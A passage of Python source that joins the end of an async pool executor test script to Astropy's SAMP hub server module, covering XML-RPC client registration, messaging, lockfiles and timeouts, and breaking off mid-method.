pool = ThreadPoolExecutor(200) # coroutines cannot be run by a thread pool, otherwise the print never executes; calling an async function f(x) only produces a coroutine, which must then be scheduled as a task on an event loop to actually run.
for i in range(1, 50001):
print('putting', i)
pool.submit(f2, i)
# time.sleep(5)
# pool.submit(f, 'hi')
# pool.submit(f, 'hi2')
# pool.submit(f, 'hi3')
# print(2222)
pool.shutdown()
print(time.time() - t1)
async def _my_fun(item):
print('hehe', item)
# await asyncio.sleep(1)
def test_async_producer_consumer():
AsyncProducerConsumer([i for i in range(100000)], concurrent_num=200, consume_fun_specify=_my_fun).start_run()
print('over')
test_async_pool_executor()
# test_async_producer_consumer()
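# A minimal usage sketch of AsyncPoolExecutor (illustrative only; it assumes this module
# is importable as async_pool_executor and that the submitted function is a coroutine):
#
# import asyncio
# from async_pool_executor import AsyncPoolExecutor
#
# async def fetch(i):
#     await asyncio.sleep(0.1)       # stand-in for real async I/O
#     print('done', i)
#
# pool = AsyncPoolExecutor(100)      # at most 100 coroutines run concurrently
# for i in range(1000):
#     pool.submit(fetch, i)          # blocks once the internal queue is full
# pool.shutdown()                    # sends stop markers and closes the loop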
|
hub.py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import copy
import os
import select
import socket
import threading
import time
import uuid
import warnings
from ..extern.six.moves import queue, range
from ..extern.six.moves import xmlrpc_client as xmlrpc
from ..extern.six.moves.urllib.parse import urlunparse
from .. import log
from .constants import SAMP_STATUS_OK
from .constants import __profile_version__
from .errors import SAMPWarning, SAMPHubError, SAMPProxyError
from .utils import internet_on, ServerProxyPool, _HubAsClient
from .lockfile_helpers import read_lockfile, create_lock_file
from .standard_profile import ThreadingXMLRPCServer
from .web_profile import WebProfileXMLRPCServer, web_profile_text_dialog
__all__ = ['SAMPHubServer', 'WebProfileDialog']
__doctest_skip__ = ['.', 'SAMPHubServer.*']
class SAMPHubServer(object):
"""
SAMP Hub Server.
Parameters
----------
secret : str, optional
The secret code to use for the SAMP lockfile. If none is specified,
the :func:`uuid.uuid1` function is used to generate one.
addr : str, optional
Listening address (or IP). This defaults to 127.0.0.1 if the internet
is not reachable, otherwise it defaults to the host name.
port : int, optional
Listening XML-RPC server socket port. If left set to 0 (the default),
the operating system will select a free port.
lockfile : str, optional
Custom lockfile name.
timeout : int, optional
Hub inactivity timeout. If ``timeout > 0`` then the Hub automatically
stops after an inactivity period longer than ``timeout`` seconds. By
default ``timeout`` is set to 0 (Hub never expires).
client_timeout : int, optional
Client inactivity timeout. If ``client_timeout > 0`` then the Hub
automatically unregisters clients that have been inactive for a
period longer than ``client_timeout`` seconds. By default
``client_timeout`` is set to 0 (clients never expire).
mode : str, optional
Defines the Hub running mode. If ``mode`` is ``'single'`` then the Hub
runs using the standard ``.samp`` lock-file, having a single instance
for user desktop session. Otherwise, if ``mode`` is ``'multiple'``,
then the Hub runs using a non-standard lock-file, placed in
``.samp-1`` directory, of the form ``samp-hub-<UUID>``, where
``<UUID>`` is a unique UUID assigned to the hub.
label : str, optional
A string used to label the Hub with a human readable name. This string
is written in the lock-file assigned to the ``hub.label`` token.
web_profile : bool, optional
Enables or disables the Web Profile support.
web_profile_dialog : class, optional
Allows a class instance to be specified using ``web_profile_dialog``
to replace the terminal-based message with e.g. a GUI pop-up. Two
`queue.Queue` instances will be added to the instance as attributes
``queue_request`` and ``queue_result``. When a request is received via
the ``queue_request`` queue, the pop-up should be displayed, and a
value of `True` or `False` should be added to ``queue_result``
depending on whether the user accepted or refused the connection.
web_port : int, optional
The port to use for web SAMP. This should not be changed except for
testing purposes, since web SAMP should always use port 21012.
pool_size : int, optional
The number of socket connections opened to communicate with the
clients.
"""
def __init__(self, secret=None, addr=None, port=0, lockfile=None,
timeout=0, client_timeout=0, mode='single', label="",
web_profile=True, web_profile_dialog=None, web_port=21012,
pool_size=20):
# Generate random ID for the hub
self._id = str(uuid.uuid1())
# General settings
self._is_running = False
self._customlockfilename = lockfile
self._lockfile = None
self._addr = addr
self._port = port
self._mode = mode
self._label = label
self._timeout = timeout
self._client_timeout = client_timeout
self._pool_size = pool_size
# Web profile specific attributes
self._web_profile = web_profile
self._web_profile_dialog = web_profile_dialog
self._web_port = web_port
self._web_profile_server = None
self._web_profile_callbacks = {}
self._web_profile_requests_queue = None
self._web_profile_requests_result = None
self._web_profile_requests_semaphore = None
self._host_name = "127.0.0.1"
if internet_on():
try:
self._host_name = socket.getfqdn()
socket.getaddrinfo(self._addr or self._host_name,
self._port or 0)
except socket.error:
self._host_name = "127.0.0.1"
# Threading stuff
self._thread_lock = threading.Lock()
self._thread_run = None
self._thread_hub_timeout = None
self._thread_client_timeout = None
self._launched_threads = []
# Variables for timeout testing:
self._last_activity_time = None
self._client_activity_time = {}
# Hub message id counter, used to create hub msg ids
self._hub_msg_id_counter = 0
# Hub secret code
self._hub_secret_code_customized = secret
self._hub_secret = self._create_secret_code()
# Hub public id (as SAMP client)
self._hub_public_id = ""
# Client ids
# {private_key: (public_id, timestamp)}
self._private_keys = {}
# Metadata per client
# {private_key: metadata}
self._metadata = {}
# List of subscribed clients per MType
# {mtype: private_key list}
self._mtype2ids = {}
# List of subscribed MTypes per client
# {private_key: mtype list}
self._id2mtypes = {}
# List of XML-RPC addresses per client
# {public_id: (XML-RPC address, ServerProxyPool instance)}
self._xmlrpc_endpoints = {}
# Synchronous message id heap
self._sync_msg_ids_heap = {}
# Public ids counter
self._client_id_counter = -1
@property
def id(self):
"""
The unique hub ID.
"""
return self._id
def _register_standard_api(self, server):
# Standard Profile only operations
server.register_function(self._ping, 'samp.hub.ping')
server.register_function(self._set_xmlrpc_callback, 'samp.hub.setXmlrpcCallback')
# Standard API operations
server.register_function(self._register, 'samp.hub.register')
server.register_function(self._unregister, 'samp.hub.unregister')
server.register_function(self._declare_metadata, 'samp.hub.declareMetadata')
server.register_function(self._get_metadata, 'samp.hub.getMetadata')
server.register_function(self._declare_subscriptions, 'samp.hub.declareSubscriptions')
server.register_function(self._get_subscriptions, 'samp.hub.getSubscriptions')
server.register_function(self._get_registered_clients, 'samp.hub.getRegisteredClients')
server.register_function(self._get_subscribed_clients, 'samp.hub.getSubscribedClients')
server.register_function(self._notify, 'samp.hub.notify')
server.register_function(self._notify_all, 'samp.hub.notifyAll')
server.register_function(self._call, 'samp.hub.call')
server.register_function(self._call_all, 'samp.hub.callAll')
server.register_function(self._call_and_wait, 'samp.hub.callAndWait')
server.register_function(self._reply, 'samp.hub.reply')
def _register_web_profile_api(self, server):
# Web Profile methods like Standard Profile
server.register_function(self._ping, 'samp.webhub.ping')
server.register_function(self._unregister, 'samp.webhub.unregister')
server.register_function(self._declare_metadata, 'samp.webhub.declareMetadata')
server.register_function(self._get_metadata, 'samp.webhub.getMetadata')
server.register_function(self._declare_subscriptions, 'samp.webhub.declareSubscriptions')
server.register_function(self._get_subscriptions, 'samp.webhub.getSubscriptions')
server.register_function(self._get_registered_clients, 'samp.webhub.getRegisteredClients')
server.register_function(self._get_subscribed_clients, 'samp.webhub.getSubscribedClients')
server.register_function(self._notify, 'samp.webhub.notify')
server.register_function(self._notify_all, 'samp.webhub.notifyAll')
server.register_function(self._call, 'samp.webhub.call')
server.register_function(self._call_all, 'samp.webhub.callAll')
server.register_function(self._call_and_wait, 'samp.webhub.callAndWait')
server.register_function(self._reply, 'samp.webhub.reply')
# Methods particularly for Web Profile
server.register_function(self._web_profile_register, 'samp.webhub.register')
server.register_function(self._web_profile_allowReverseCallbacks, 'samp.webhub.allowReverseCallbacks')
server.register_function(self._web_profile_pullCallbacks, 'samp.webhub.pullCallbacks')
def _start_standard_server(self):
self._server = ThreadingXMLRPCServer(
(self._addr or self._host_name, self._port or 0),
log, logRequests=False, allow_none=True)
prot = 'http'
self._port = self._server.socket.getsockname()[1]
addr = "{0}:{1}".format(self._addr or self._host_name, self._port)
self._url = urlunparse((prot, addr, '', '', '', ''))
self._server.register_introspection_functions()
self._register_standard_api(self._server)
def _start_web_profile_server(self):
self._web_profile_requests_queue = queue.Queue(1)
self._web_profile_requests_result = queue.Queue(1)
self._web_profile_requests_semaphore = queue.Queue(1)
if self._web_profile_dialog is not None:
# TODO: Some sort of duck-typing on the web_profile_dialog object
self._web_profile_dialog.queue_request = \
self._web_profile_requests_queue
self._web_profile_dialog.queue_result = \
self._web_profile_requests_result
try:
self._web_profile_server = WebProfileXMLRPCServer(
('localhost', self._web_port), log, logRequests=False,
allow_none=True)
self._web_port = self._web_profile_server.socket.getsockname()[1]
self._web_profile_server.register_introspection_functions()
self._register_web_profile_api(self._web_profile_server)
log.info("Hub set to run with Web Profile support enabled.")
except socket.error:
log.warning("Port {0} already in use. Impossible to run the "
"Hub with Web Profile support.".format(self._web_port),
SAMPWarning)
self._web_profile = False
# Cleanup
self._web_profile_requests_queue = None
self._web_profile_requests_result = None
self._web_profile_requests_semaphore = None
def _launch_thread(self, group=None, target=None, name=None, args=None):
# Remove inactive threads
remove = []
for t in self._launched_threads:
if not t.is_alive():
remove.append(t)
for t in remove:
self._launched_threads.remove(t)
# Start new thread
t = threading.Thread(group=group, target=target, name=name, args=args)
t.start()
# Add to list of launched threads
self._launched_threads.append(t)
def _join_launched_threads(self, timeout=None):
for t in self._launched_threads:
t.join(timeout=timeout)
def _timeout_test_hub(self):
if self._timeout == 0:
return
last = time.time()
while self._is_running:
time.sleep(0.05) # keep this small to check _is_running often
now = time.time()
if now - last > 1.:
with self._thread_lock:
if self._last_activity_time is not None:
if now - self._last_activity_time >= self._timeout:
warnings.warn("Timeout expired, Hub is shutting down!",
SAMPWarning)
self.stop()
return
last = now
def _timeout_test_client(self):
if self._client_timeout == 0:
return
last = time.time()
while self._is_running:
time.sleep(0.05) # keep this small to check _is_running often
now = time.time()
if now - last > 1.:
for private_key in self._client_activity_time.keys():
if (now - self._client_activity_time[private_key] > self._client_timeout
and private_key != self._hub_private_key):
warnings.warn(
"Client {} timeout expired!".format(private_key),
SAMPWarning)
self._notify_disconnection(private_key)
self._unregister(private_key)
last = now
def _hub_as_client_request_handler(self, method, args):
if method == 'samp.client.receiveCall':
return self._receive_call(*args)
elif method == 'samp.client.receiveNotification':
return self._receive_notification(*args)
elif method == 'samp.client.receiveResponse':
return self._receive_response(*args)
elif method == 'samp.app.ping':
return self._ping(*args)
def _setup_hub_as_client(self):
hub_metadata = {"samp.name": "Astropy SAMP Hub",
"samp.description.text": self._label,
"author.name": "The Astropy Collaboration",
"samp.documentation.url": "http://docs.astropy.org/en/stable/vo/samp",
"samp.icon.url": self._url + "/samp/icon"}
result = self._register(self._hub_secret)
self._hub_public_id = result["samp.self-id"]
self._hub_private_key = result["samp.private-key"]
self._set_xmlrpc_callback(self._hub_private_key, self._url)
self._declare_metadata(self._hub_private_key, hub_metadata)
self._declare_subscriptions(self._hub_private_key,
{"samp.app.ping": {},
"x-samp.query.by-meta": {}})
def start(self, wait=False):
"""
Start the current SAMP Hub instance and create the lock file. Hub
start-up can be blocking or non blocking depending on the ``wait``
parameter.
Parameters
----------
wait : bool
If `True` then the Hub process is joined with the caller, blocking
the code flow. Usually `True` option is used to run a stand-alone
Hub in an executable script. If `False` (default), then the Hub
process runs in a separated thread. `False` is usually used in a
Python shell.
"""
if self._is_running:
raise SAMPHubError("Hub is already running")
if self._lockfile is not None:
raise SAMPHubError("Hub is not running but lockfile is set")
if self._web_profile:
self._start_web_profile_server()
self._start_standard_server()
self._lockfile = create_lock_file(lockfilename=self._customlockfilename,
mode=self._mode, hub_id=self.id,
hub_params=self.params)
self._update_last_activity_time()
self._setup_hub_as_client()
self._start_threads()
log.info("Hub started")
if wait and self._is_running:
self._thread_run.join()
self._thread_run = None
@property
def params(self):
"""
The hub parameters (which are written to the lock file)
"""
params = {}
# Keys required by standard profile
params['samp.secret'] = self._hub_secret
params['samp.hub.xmlrpc.url'] = self._url
params['samp.profile.version'] = __profile_version__
# Custom keys
params['hub.id'] = self.id
params['hub.label'] = self._label or "Hub {0}".format(self.id)
return params
def _start_threads(self):
self._thread_run = threading.Thread(target=self._serve_forever)
self._thread_run.daemon = True
if self._timeout > 0:
self._thread_hub_timeout = threading.Thread(
target=self._timeout_test_hub,
name="Hub timeout test")
self._thread_hub_timeout.daemon = True
else:
self._thread_hub_timeout = None
if self._client_timeout > 0:
self._thread_client_timeout = threading.Thread(
target=self._timeout_test_client,
name="Client timeout test")
self._thread_client_timeout.daemon = True
else:
self._thread_client_timeout = None
self._is_running = True
self._thread_run.start()
if self._thread_hub_timeout is not None:
self._thread_hub_timeout.start()
if self._thread_client_timeout is not None:
self._thread_client_timeout.start()
def _create_secret_code(self):
if self._hub_secret_code_customized is not None:
return self._hub_secret_code_customized
else:
return str(uuid.uuid1())
def stop(self):
"""
Stop the current SAMP Hub instance and delete the lock file.
"""
if not self._is_running:
return
log.info("Hub is stopping...")
self._notify_shutdown()
self._is_running = False
if self._lockfile and os.path.isfile(self._lockfile):
lockfiledict = read_lockfile(self._lockfile)
if lockfiledict['samp.secret'] == self._hub_secret:
os.remove(self._lockfile)
self._lockfile = None
# Reset variables
# TODO: What happens if not all threads are stopped after timeout?
self._join_all_threads(timeout=10.)
self._hub_msg_id_counter = 0
self._hub_secret = self._create_secret_code()
self._hub_public_id = ""
self._metadata = {}
self._private_keys = {}
self._mtype2ids = {}
self._id2mtypes = {}
self._xmlrpc_endpoints = {}
self._last_activity_time = None
log.info("Hub stopped.")
def _join_all_threads(self, timeout=None):
# In some cases, ``stop`` may be called from some of the sub-threads,
# so we just need to make sure that we don't try and shut down the
# calling thread.
current_thread = threading.current_thread()
if self._thread_run is not current_thread:
self._thread_run.join(timeout=timeout)
if not self._thread_run.is_alive():
self._thread_run = None
if self._thread_hub_timeout is not None and self._thread_hub_timeout is not current_thread:
self._thread_hub_timeout.join(timeout=timeout)
if not self._thread_hub_timeout.is_alive():
self._thread_hub_timeout = None
if self._thread_client_timeout is not None and self._thread_client_timeout is not current_thread:
self._thread_client_timeout.join(timeout=timeout)
if not self._thread_client_timeout.is_alive():
self._thread_client_timeout = None
self._join_launched_threads(timeout=timeout)
@property
def is_running(self):
"""Return an information concerning the Hub running status.
Returns
-------
running : bool
Is the hub running?
"""
return self._is_running
def _serve_forever(self):
while self._is_running:
try:
read_ready = select.select([self._server.socket], [], [], 0.01)[0]
except select.error as exc:
warnings.warn("Call to select() in SAMPHubServer failed: {0}".format(exc),
SAMPWarning)
else:
if read_ready:
self._server.handle_request()
if self._web_profile:
# We now check if there are any connection requests from the
# web profile, and if so, we initialize the pop-up.
if self._web_profile_dialog is None:
try:
request = self._web_profile_requests_queue.get_nowait()
except queue.Empty:
pass
else:
web_profile_text_dialog(request, self._web_profile_requests_result)
# We now check for requests over the web profile socket, and we
# also update the pop-up in case there are any changes.
try:
read_ready = select.select([self._web_profile_server.socket], [], [], 0.01)[0]
except select.error as exc:
warnings.warn("Call to select() in SAMPHubServer failed: {0}".format(exc),
SAMPWarning)
else:
if read_ready:
self._web_profile_server.handle_request()
self._server.server_close()
if self._web_profile_server is not None:
self._web_profile_server.server_close()
def _notify_shutdown(self):
msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.shutdown")
for mtype in msubs:
if mtype in self._mtype2ids:
for key in self._mtype2ids[mtype]:
self._notify_(self._hub_private_key,
self._private_keys[key][0],
{"samp.mtype": "samp.hub.event.shutdown",
"samp.params": {}})
def _notify_register(self, private_key):
msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.register")
for mtype in msubs:
if mtype in self._mtype2ids:
public_id = self._private_keys[private_key][0]
for key in self._mtype2ids[mtype]:
# if key != private_key:
self._notify(self._hub_private_key,
self._private_keys[key][0],
{"samp.mtype": "samp.hub.event.register",
"samp.params": {"id": public_id}})
def _notify_unregister(self, private_key):
msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.unregister")
for mtype in msubs:
if mtype in self._mtype2ids:
public_id = self._private_keys[private_key][0]
for key in self._mtype2ids[mtype]:
if key != private_key:
self._notify(self._hub_private_key,
self._private_keys[key][0],
{"samp.mtype": "samp.hub.event.unregister",
"samp.params": {"id": public_id}})
def _notify_metadata(self, private_key):
msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.metadata")
for mtype in msubs:
if mtype in self._mtype2ids:
public_id = self._private_keys[private_key][0]
for key in self._mtype2ids[mtype]:
# if key != private_key:
self._notify(self._hub_private_key,
self._private_keys[key][0],
{"samp.mtype": "samp.hub.event.metadata",
"samp.params": {"id": public_id,
"metadata": self._metadata[private_key]}
})
def _notify_subscriptions(self, private_key):
msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.subscriptions")
for mtype in msubs:
if mtype in self._mtype2ids:
public_id = self._private_keys[private_key][0]
for key in self._mtype2ids[mtype]:
self._notify(self._hub_private_key,
self._private_keys[key][0],
{"samp.mtype": "samp.hub.event.subscriptions",
"samp.params": {"id": public_id,
"subscriptions": self._id2mtypes[private_key]}
})
def _notify_disconnection(self, private_key):
def _xmlrpc_call_disconnect(endpoint, private_key, hub_public_id, message):
endpoint.samp.client.receiveNotification(private_key, hub_public_id, message)
msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.disconnect")
public_id = self._private_keys[private_key][0]
endpoint = self._xmlrpc_endpoints[public_id][1]
for mtype in msubs:
if mtype in self._mtype2ids and private_key in self._mtype2ids[mtype]:
log.debug("notify disconnection to {}".format(public_id))
self._launch_thread(target=_xmlrpc_call_disconnect,
args=(endpoint, private_key,
self._hub_public_id,
{"samp.mtype": "samp.hub.disconnect",
"samp.params": {"reason": "Timeout expired!"}}))
def _ping(self):
self._update_last_activity_time()
log.debug("ping")
return "1"
def _query_by_metadata(self, key, value):
public_id_list = []
for private_id in self._metadata:
if key in self._metadata[private_id]:
if self._metadata[private_id][key] == value:
public_id_list.append(self._private_keys[private_id][0])
return public_id_list
def _set_xmlrpc_callback(self, private_key, xmlrpc_addr):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
if private_key == self._hub_private_key:
public_id = self._private_keys[private_key][0]
self._xmlrpc_endpoints[public_id] = \
(xmlrpc_addr, _HubAsClient(self._hub_as_client_request_handler))
return ""
# Dictionary stored with the public id
log.debug("set_xmlrpc_callback: {} {}".format(private_key,
xmlrpc_addr))
server_proxy_pool = None
server_proxy_pool = ServerProxyPool(self._pool_size,
xmlrpc.ServerProxy,
xmlrpc_addr, allow_none=1)
public_id = self._private_keys[private_key][0]
self._xmlrpc_endpoints[public_id] = (xmlrpc_addr,
server_proxy_pool)
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
return ""
def _perform_standard_register(self):
with self._thread_lock:
private_key, public_id = self._get_new_ids()
self._private_keys[private_key] = (public_id, time.time())
self._update_last_activity_time(private_key)
self._notify_register(private_key)
log.debug("register: private-key = {} and self-id = {}"
.format(private_key, public_id))
return {"samp.self-id": public_id,
"samp.private-key": private_key,
"samp.hub-id": self._hub_public_id}
def _register(self, secret):
self._update_last_activity_time()
if secret == self._hub_secret:
return self._perform_standard_register()
else:
# return {"samp.self-id": "", "samp.private-key": "", "samp.hub-id": ""}
raise SAMPProxyError(7, "Bad secret code")
def _get_new_ids(self):
private_key = str(uuid.uuid1())
self._client_id_counter += 1
public_id = 'cli#hub'
if self._client_id_counter > 0:
public_id = "cli#{}".format(self._client_id_counter)
return private_key, public_id
def _unregister(self, private_key):
self._update_last_activity_time()
public_key = ""
self._notify_unregister(private_key)
with self._thread_lock:
if private_key in self._private_keys:
public_key = self._private_keys[private_key][0]
del self._private_keys[private_key]
else:
return ""
if private_key in self._metadata:
del self._metadata[private_key]
if private_key in self._id2mtypes:
del self._id2mtypes[private_key]
for mtype in self._mtype2ids.keys():
if private_key in self._mtype2ids[mtype]:
self._mtype2ids[mtype].remove(private_key)
if public_key in self._xmlrpc_endpoints:
del self._xmlrpc_endpoints[public_key]
if private_key in self._client_activity_time:
del self._client_activity_time[private_key]
if self._web_profile:
if private_key in self._web_profile_callbacks:
del self._web_profile_callbacks[private_key]
self._web_profile_server.remove_client(private_key)
log.debug("unregister {} ({})".format(public_key, private_key))
return ""
def _declare_metadata(self, private_key, metadata):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
log.debug("declare_metadata: private-key = {} metadata = {}"
.format(private_key, str(metadata)))
self._metadata[private_key] = metadata
self._notify_metadata(private_key)
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
return ""
def _get_metadata(self, private_key, client_id):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
client_private_key = self._public_id_to_private_key(client_id)
log.debug("get_metadata: private-key = {} client-id = {}"
.format(private_key, client_id))
if client_private_key is not None:
if client_private_key in self._metadata:
log.debug("--> metadata = {}"
.format(self._metadata[client_private_key]))
return self._metadata[client_private_key]
else:
return {}
else:
raise SAMPProxyError(6, "Invalid client ID")
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
def _declare_subscriptions(self, private_key, mtypes):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
log.debug("declare_subscriptions: private-key = {} mtypes = {}"
.format(private_key, str(mtypes)))
# remove subscription to previous mtypes
if private_key in self._id2mtypes:
prev_mtypes = self._id2mtypes[private_key]
for mtype in prev_mtypes:
try:
self._mtype2ids[mtype].remove(private_key)
except ValueError: # private_key is not in list
pass
self._id2mtypes[private_key] = copy.deepcopy(mtypes)
# remove duplicated MType for wildcard overwriting
original_mtypes = copy.deepcopy(mtypes)
for mtype in original_mtypes:
if mtype.endswith("*"):
for mtype2 in original_mtypes:
if mtype2.startswith(mtype[:-1]) and \
mtype2 != mtype:
if mtype2 in mtypes:
del(mtypes[mtype2])
log.debug("declare_subscriptions: subscriptions accepted from "
"{} => {}".format(private_key, str(mtypes)))
for mtype in mtypes:
if mtype in self._mtype2ids:
if private_key not in self._mtype2ids[mtype]:
self._mtype2ids[mtype].append(private_key)
else:
self._mtype2ids[mtype] = [private_key]
self._notify_subscriptions(private_key)
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
return ""
def _get_subscriptions(self, private_key, client_id):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
client_private_key = self._public_id_to_private_key(client_id)
if client_private_key is not None:
if client_private_key in self._id2mtypes:
log.debug("get_subscriptions: client-id = {} mtypes = {}"
.format(client_id,
str(self._id2mtypes[client_private_key])))
return self._id2mtypes[client_private_key]
else:
log.debug("get_subscriptions: client-id = {} mtypes = "
"missing".format(client_id))
return {}
else:
raise SAMPProxyError(6, "Invalid client ID")
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
def _get_registered_clients(self, private_key):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
reg_clients = []
for pkey in self._private_keys.keys():
if pkey != private_key:
reg_clients.append(self._private_keys[pkey][0])
log.debug("get_registered_clients: private_key = {} clients = {}"
.format(private_key, reg_clients))
return reg_clients
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
def _get_subscribed_clients(self, private_key, mtype):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
sub_clients = {}
for pkey in self._private_keys.keys():
if pkey != private_key and self._is_subscribed(pkey, mtype):
sub_clients[self._private_keys[pkey][0]] = {}
log.debug("get_subscribed_clients: private_key = {} mtype = {} "
"clients = {}".format(private_key, mtype, sub_clients))
return sub_clients
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
@staticmethod
def get_mtype_subtypes(mtype):
"""
Return a list containing all the possible wildcarded subtypes of MType.
Parameters
----------
mtype : str
MType to be parsed.
Returns
-------
types : list
List of subtypes
Examples
--------
>>> from astropy.samp import SAMPHubServer
>>> SAMPHubServer.get_mtype_subtypes("samp.app.ping")
['samp.app.ping', 'samp.app.*', 'samp.*', '*']
"""
subtypes = []
msubs = mtype.split(".")
indexes = list(range(len(msubs)))
indexes.reverse()
indexes.append(-1)
for i in indexes:
tmp_mtype = ".".join(msubs[:i + 1])
if tmp_mtype != mtype:
if tmp_mtype != "":
tmp_mtype = tmp_mtype + ".*"
else:
tmp_mtype = "*"
subtypes.append(tmp_mtype)
return subtypes
def _is_subscribed(self, private_key, mtype):
subscribed = False
msubs = SAMPHubServer.get_mtype_subtypes(mtype)
for msub in msubs:
if msub in self._mtype2ids:
if private_key in self._mtype2ids[msub]:
subscribed = True
return subscribed
def _notify(self, private_key, recipient_id, message):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
if self._is_subscribed(self._public_id_to_private_key(recipient_id),
message["samp.mtype"]) is False:
raise SAMPProxyError(2, "Client {} not subscribed to MType {}"
.format(recipient_id, message["samp.mtype"]))
self._launch_thread(target=self._notify_, args=(private_key,
recipient_id,
message))
return {}
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
def _notify_(self, sender_private_key, recipient_public_id, message):
if sender_private_key not in self._private_keys:
return
sender_public_id = self._private_keys[sender_private_key][0]
try:
log.debug("notify {} from {} to {}".format(
message["samp.mtype"], sender_public_id,
recipient_public_id))
recipient_private_key = self._public_id_to_private_key(recipient_public_id)
arg_params = (sender_public_id, message)
samp_method_name = "receiveNotification"
self._retry_method(recipient_private_key, recipient_public_id, samp_method_name, arg_params)
except Exception as exc:
warnings.warn("{} notification from client {} to client {} "
"failed [{}]".format(message["samp.mtype"],
sender_public_id,
recipient_public_id, exc),
SAMPWarning)
def _notify_all(self, private_key, message):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
if "samp.mtype" not in message:
raise SAMPProxyError(3, "samp.mtype keyword is missing")
recipient_ids = self._notify_all_(private_key, message)
return recipient_ids
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
def _notify_all_(self, sender_private_key, message):
recipient_ids = []
msubs = SAMPHubServer.get_mtype_subtypes(message["samp.mtype"])
for mtype in msubs:
if mtype in self._mtype2ids:
for key in self._mtype2ids[mtype]:
if key != sender_private_key:
_recipient_id = self._private_keys[key][0]
recipient_ids.append(_recipient_id)
self._launch_thread(target=self._notify,
args=(sender_private_key,
_recipient_id, message)
)
return recipient_ids
def _call(self, private_key, recipient_id, msg_tag, message):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
if self._is_subscribed(self._public_id_to_private_key(recipient_id),
message["samp.mtype"]) is False:
raise SAMPProxyError(2, "Client {} not subscribed to MType {}"
.format(recipient_id, message["samp.mtype"]))
public_id = self._private_keys[private_key][0]
msg_id = self._get_new_hub_msg_id(public_id, msg_tag)
self._launch_thread(target=self._call_, args=(private_key, public_id,
recipient_id, msg_id,
message))
return msg_id
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
def _call_(self, sender_private_key, sender_public_id,
recipient_public_id, msg_id, message):
if sender_private_key not in self._private_keys:
return
try:
log.debug("call {} from {} to {} ({})".format(
msg_id.split(";;")[0], sender_public_id,
recipient_public_id, message["samp.mtype"]))
recipient_private_key = self._public_id_to_private_key(recipient_public_id)
arg_params = (sender_public_id, msg_id, message)
samp_methodName = "receiveCall"
self._retry_method(recipient_private_key, recipient_public_id, samp_methodName, arg_params)
except Exception as exc:
warnings.warn("{} call {} from client {} to client {} failed "
"[{},{}]".format(message["samp.mtype"],
msg_id.split(";;")[0],
sender_public_id,
recipient_public_id, type(exc), exc),
SAMPWarning)
def _call_all(self, private_key, msg_tag, message):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
if "samp.mtype" not in message:
raise SAMPProxyError(3, "samp.mtype keyword is missing in "
"message tagged as {}".format(msg_tag))
public_id = self._private_keys[private_key][0]
msg_id = self._call_all_(private_key, public_id, msg_tag, message)
return msg_id
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
def _call_all_(self, sender_private_key, sender_public_id, msg_tag,
message):
msg_id = {}
msubs = SAMPHubServer.get_mtype_subtypes(message["samp.mtype"])
for mtype in msubs:
if mtype in self._mtype2ids:
for key in self._mtype2ids[mtype]:
if key != sender_private_key:
_msg_id = self._get_new_hub_msg_id(sender_public_id,
msg_tag)
receiver_public_id = self._private_keys[key][0]
msg_id[receiver_public_id] = _msg_id
self._launch_thread(target=self._call_,
args=(sender_private_key,
sender_public_id,
receiver_public_id, _msg_id,
message))
return msg_id
def _call_and_wait(self, private_key, recipient_id, message, timeout):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
timeout = int(timeout)
now = time.time()
response = {}
msg_id = self._call(private_key, recipient_id, "samp::sync::call",
message)
self._sync_msg_ids_heap[msg_id] = None
while self._is_running:
if timeout > 0 and time.time() - now >= timeout:
del(self._sync_msg_ids_heap[msg_id])
raise SAMPProxyError(1, "Timeout expired!")
if self._sync_msg_ids_heap[msg_id] is not None:
response = copy.deepcopy(self._sync_msg_ids_heap[msg_id])
del(self._sync_msg_ids_heap[msg_id])
break
time.sleep(0.01)
return response
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
def _reply(self, private_key, msg_id, response):
"""
The main method that gets called for replying. This starts up an
asynchronous reply thread and returns.
"""
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
self._launch_thread(target=self._reply_, args=(private_key, msg_id,
response))
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
return {}
def _reply_(self, responder_private_key, msg_id, response):
if responder_private_key not in self._private_keys or not msg_id:
return
responder_public_id = self._private_keys[responder_private_key][0]
counter, hub_public_id, recipient_public_id, recipient_msg_tag = msg_id.split(";;", 3)
try:
log.debug("reply {} from {} to {}".format(
counter, responder_public_id, recipient_public_id))
if recipient_msg_tag == "samp::sync::call":
if msg_id in self._sync_msg_ids_heap.keys():
self._sync_msg_ids_heap[msg_id] = response
else:
recipient_private_key = self._public_id_to_private_key(recipient_public_id)
